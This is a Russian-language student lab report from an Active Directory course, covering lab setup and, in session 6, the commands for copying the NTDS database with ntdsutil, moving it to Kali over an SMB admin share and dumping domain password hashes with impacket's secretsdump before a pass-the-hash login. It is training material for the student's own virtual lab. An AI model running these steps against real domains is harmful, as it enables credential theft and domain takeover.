# **Модуль Active Directory ** Здесь предлагается заскринить основные моменты всех практик, которые были выполнены. Занятие 1 Oracle Virtualbox установлен; Oracle Virtualbox extentions установлены; Windows Server 2016 (анлгийская версия) установлен; Windows Server 2016 (русская версия) установлен; Windows 10 установлен; Mikrotik импортирован; На Mikrotik настроен сетевой адаптер локальной сети; На Mikrotik настроен NAT. ![](https://i.imgur.com/vo9TWU7.png) ![](https://i.imgur.com/POWGJKj.png) ![](https://i.imgur.com/63ihlG3.png) Занятие 2 Статические адреса настроены на двух WinServer; Имена компьютеров Winserver и Win10 настроены (dc1, dc2, pc1); На оба WinServer установлены роли AD, DHCP, DNS; WinServer en сконфигурирован как основной контроллер домена hackeru.local; WinServer ru сконфигурирован как второстепенный контроллер домена; Win10 внесён в домен. ![](https://i.imgur.com/zcePfaw.png) ![](https://i.imgur.com/B6d301a.png) ![](https://i.imgur.com/22cdNtI.png) ![](https://i.imgur.com/dk3lGPN.png) ![](https://i.imgur.com/YFwr0I1.png) Занятие 3 Применён скрипт newadusergroups.ps1 (созданы OU, пользователи и группы). По итогу в домене будет такая структура объектов: ![](https://i.imgur.com/A8TSUPy.png) Занятие 4 DHCP сервер сконфигурирован на одном из контроллеров домена; Создана групповая политики расширенного логирования; Политика применена на контроллеры домена. ![](https://i.imgur.com/whrBJKU.png) Занятие 5 Создана сетевая папка на одном из контроллеров домена; К сетевой папке примены настройки аудита удаления файлов; От имени любого пользователя, работающего на Win10, проведено удаление вложенных файлов/папок из сетевой папки; В журнале событий найдены события удаления. ![](https://i.imgur.com/TFgf7Wu.png) ![](https://i.imgur.com/AewkKkF.png) ![](https://i.imgur.com/YWSkt5y.png) Занятие 6 Проведён бэкап файла NTDS; Бэкап перекинут на Kali linux; Просмотрено содержимое файла с помощью secrestdump; Загружен .exe или .msi файл с Kali Linux на рабочий стол одного из пользователей win10; Удалось подключиться с Kali по RDP на Win10; С помощью mitm6 перехвачена аутентификация трёх пользователей домена. **Занятие 6** * Проводим бэкап NTDS В командную строку Windows ( от имени администратора) вводим команды: > ntdsutil activate instance ntds ifm create full C:\temp Делает копию NTDS c ветками реестра Далее мы видим в папке temp - папку registry ( в которой содержатся SYSTEM, SECURITY) * Переносим NTDS на KALI Linux. C помощью SMB входим с Kali на Win ``` smbclient ‘\\192.168.10.201\C$’ -U testdomain/Administrator >мой вариант- smbclient ‘\\192.168.10.201\C$’ -U hackeru.local/Administrator где 192.168.10.201 – ip адрес контроллера домена, testdomain – имя домена, Administrator – имя учетной записи с правами администратора. ``` ![](https://i.imgur.com/3ZmsUGd.png) * Проводим анализ NTDS Скачиваем impacket находясь в домашней директории на KALI ``` git clone https://github.com/SecureAuthCorp/impacket apt install python3-pip cd impacket pip install . ``` После установки - переходим в директорию examples (она находится внутри папки impacket) и выполняем команду: ``` python3 secretdump.py -ntds /home/user/temp/Active\ Direcrory/ntds.dit -system /home/user/temp/registry/SYSTEM LOCAL где secretdump.py – исполняемый скрипт, ntds.dit – анализируемый инстанс базы данных NTDS, registry/SYSTEM – ветка реестра, с помощью которой мы можем прочитать NTDS, LOCAL – флаг для скрипта, который говорит, что мы анализируем NTDS локально. Внимательно следите за слешами – мы экранируем пробелы обратным слешем. В моем случае python3 secretdump.py -ntds /temp/Active\ Direcrory/ntds.dit -system /temp/registry/SYSTEM LOCAL ``` ![](https://i.imgur.com/8ODThoz.png) Получили аутетификационные данные объектов домена hackeru.local ![](https://i.imgur.com/NLhELW0.png) Вошли под администратором с помощью хэша. ![](https://i.imgur.com/NNhxazN.png) Не понятно почему не хочет давать аутентификацию через длинный хэш. Отключил брандмауэр на DC1, в политиках поковырялся, с надеждой на то что все заработает. Но увы. ![](https://i.imgur.com/YiibHnL.png) Час потратил на поиск ошибки(правда уже была глубокая ночь), в итоге Исраэль подсказал - что ошибка в написании домена ![](https://i.imgur.com/gDsjyor.png) Дальше уже не пошел. Каша в голове от недосыпа и большого кол-ва инфы. Но [задачи](https://hackmd.io/@UncleVan/S1hZU5wgK) остальные по мере возможности порешаю. Занятие 7 - не приступал Проведена атака zerologon; Просмотрено содержимое файла NTDS удалённо; Найдены события, подтверждающие факт компрометации домена.